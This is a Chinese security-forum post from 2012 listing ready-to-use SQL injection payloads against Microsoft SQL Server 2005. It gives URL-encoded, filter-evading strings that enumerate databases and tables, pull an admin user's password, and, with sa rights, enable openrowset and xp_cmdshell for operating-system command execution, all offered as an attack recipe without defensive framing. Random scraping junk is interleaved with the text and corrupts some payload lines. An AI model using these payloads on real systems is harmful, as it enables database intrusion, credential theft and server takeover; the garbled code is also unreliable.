找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2765|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

4 b" w$ a" u1 @. i# |* @% `
9 U- G3 {; w  [1 Z' O
$ j. F$ J# M* e  B& ~[Copy to clipboard]CODE:+ W. f' {3 S; |: s
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--5 Z& N0 R, S8 ~2 R& ~0 d; n2 K

. V) w3 v( \/ f7 L1 ]爆表语句,somedb部份是所要列的数据库,红色数字1累加, C. B- _0 r7 U, H3 C3 j; ~; i
7 x- H5 n& l+ j
: K2 y0 K) W& I1 N8 w" `" R
[Copy to clipboard]CODE:2 l2 h8 w4 E5 d5 T8 s& v
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--: h6 H/ B5 g5 ^2 }" b

( A1 L" _+ q! V" ?. D* o爆字段语句,爆表admin里user='icerover'的密码段
+ W/ @: ~0 d/ {5 ~, g$ X+ H' Q& Q& v! Y, F! r& s( l. K% {
" u  F' ~/ d. a% g0 i
[Copy to clipboard]CODE:
/ L0 B$ x4 }4 v7 k8 P**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--6 y# t2 y  e/ W& _2 g& h& M9 b3 w- q

+ x# F" r& L) s: T" }" v) xmssql2005默认没有开xp_cmdshell的,openrowset也不能用, Y8 s' P- b* D8 s
如果是sa权限,可以这样来开启
( E8 @! O- @& ?6 C9 F6 _0 O. Z开启openrowset# f2 |# X3 v% J
" ?' G$ y# y: z3 k, H& l
' o) a+ P0 E. e/ r& P2 q" d
[Copy to clipboard]CODE:
6 \! v6 F* K3 }# z( y/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--+ ^& ?# Y; a0 S3 g; k
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
% _6 G! O4 u; `4 E8 F7 S& a5 }8 {# `* Z, L3 p( i4 m: V  K7 D
开启xp_cmdshell
1 Y0 M8 B8 S: i. a' S' o& A8 `/ \6 X' c# W, a7 ^1 M$ K

% w3 K& P' |9 S  P( v) X- a[Copy to clipboard]CODE:
' t6 C+ Y, ^  n  l4 @% Y5 yEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--) \  j, x# w( S6 J9 T  g, M
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--7 L6 ^9 v9 n, R6 O6 L) v" Y
, _' R, r7 o: T# O# q
ok,over~~晚安
6 t5 l1 H4 C6 G4 H1 l+ s8 ]# w' c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表